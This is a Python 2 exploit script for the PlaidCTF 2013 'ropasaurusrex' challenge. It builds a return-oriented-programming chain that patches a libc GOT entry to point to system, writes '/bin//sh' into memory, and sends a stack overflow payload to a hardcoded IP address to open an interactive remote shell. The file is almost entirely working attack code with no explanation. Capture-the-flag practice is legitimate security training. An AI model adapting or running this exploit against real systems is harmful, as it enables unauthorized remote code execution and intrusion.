# pCTF 2013 
# ropasaurusrex200
# mak - DragonSector

#!/usr/bin/env python2
from struct import pack
import socket,telnetlib

#system_off       = 0x003e6c0
system_off       = 0x0039450
#__libc_start_off = 0x00196d0
__libc_start_off = 0x0016bc0
__libc_start_plt = 0x8049618
data_off         = 0x08049010

rop = ''
## fixup libc_start to system
rop += pack('I',0x080484b5) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
rop += pack('i',__libc_start_plt - 0x5d5b04c4) #
rop += pack('I',system_off-__libc_start_off-8)
rop += "A"*4 + "B"*4 ## junk
rop += pack('I',0x080483bb)#  xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret  ;
## write /bin
rop += pack('I',0x080484b5) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
rop += pack('i',data_off - 0x5d5b04c4) #
#rop += pack('I',0x20746163-0x00030002-8)
rop += pack('I',0x6e69622f-0x00030002-8)
#rop += pack('I',0x706d742f-0x00030002-8)
rop += "A"*4 + "B"*4 ## junk
rop += pack('I',0x080483bb)#  xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ;
#write "//sh"
rop += pack('I',0x080484b5) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
rop += pack('i',(data_off+4) - 0x5d5b04c4) #
#rop += pack('I',0x00-1-8)
rop += pack('I',0x0068732f-1-8)
#rop += pack('i',0x6c662f7e-1-8)
rop += "A"*4 + "B"*4 ## junk
rop += pack('I',0x080483bb)#  xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ;

# rop += pack('I',0x080484b5) #pop ebx ; pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)
# rop += pack('i',(data_off+8) - 0x5d5b04c4) #
# rop += pack('i',0x6761-0x08048340-8)
# rop += "A"*4 + "B"*4 ## junk
# rop += pack('I',0x080483bb)#  xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ;


payload = "A"*140
#eip
payload += rop
payload += pack('I',0x804831c) # __libc_start@plt
payload += pack('I',0xdeadbeef)
payload += pack('I',data_off)
#stack sizes

payload += "C"*0x112

tl = telnetlib.Telnet('54.234.151.114',1025)
tl.write(payload)
tl.interact()
#open('crash','w').write(payload)

# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# s.connect(('54.234.151.114',1025))
# s.send(payload)
# print s.recv(0x1000)